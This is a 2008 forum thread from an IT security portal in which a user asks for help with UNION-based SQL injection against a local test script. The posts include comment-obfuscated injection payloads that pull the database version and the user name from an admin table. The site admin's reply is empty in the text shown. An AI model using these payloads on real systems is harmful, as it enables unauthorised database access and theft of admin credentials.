|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Help SQL injection |
|
Posted: Fri May 09, 2008 2:16 pm |
|
|
nox |
Advanced user |
|
|
Joined: Dec 29, 2007 |
Posts: 100 |
Location: c://windows/system32 |
|
|
|
|
|
|
Hi , i test in my localhost a script :
Code: | http://localhost/?browse&id=9'/**/union/**/select/**/1,2,3,4,5,6/**/from/**/admin/* |
and i find one column is '6' in the title bar .
and whene i put '@@version' or column name of user or password , i get just one char ; for example :
Code: | 9'/**/union/**/select/**/1,2,3,4,5,@@version/**/from/**/admin/* |
i find just '5' , and whene i put 'user'
Code: | 9'/**/union/**/select/**/1,2,3,4,5,user/**/from/**/admin/* |
i find just 'a'
and the real User is 'admin' and the Real version is '5.x.x'
and thanks of help . |
|
Last edited by nox on Fri May 09, 2008 2:19 pm; edited 1 time in total _________________ ..::::[ Waraxe.us is the BEST and the TOP ]::::.. |
|
|
|
|
|
|
|
Posted: Fri May 09, 2008 2:18 pm |
|
|
nox |
Advanced user |
|
|
Joined: Dec 29, 2007 |
Posts: 100 |
Location: c://windows/system32 |
|
|
|
|
|
|
for examples , whene i put this :
Code: | http://localhost/?browse&id=9'/**/union/**/select/**/1,2,3,4,5,6666/**/from/**/admin/* |
i find just '6'
and whene . . .
Code: | http://localhost/?browse&id=9'/**/union/**/select/**/1,2,3,4,5,999999/**/from/**/admin/* |
i find this '9' just one number |
|
_________________ ..::::[ Waraxe.us is the BEST and the TOP ]::::.. |
|
|
|
Posted: Fri May 09, 2008 7:01 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|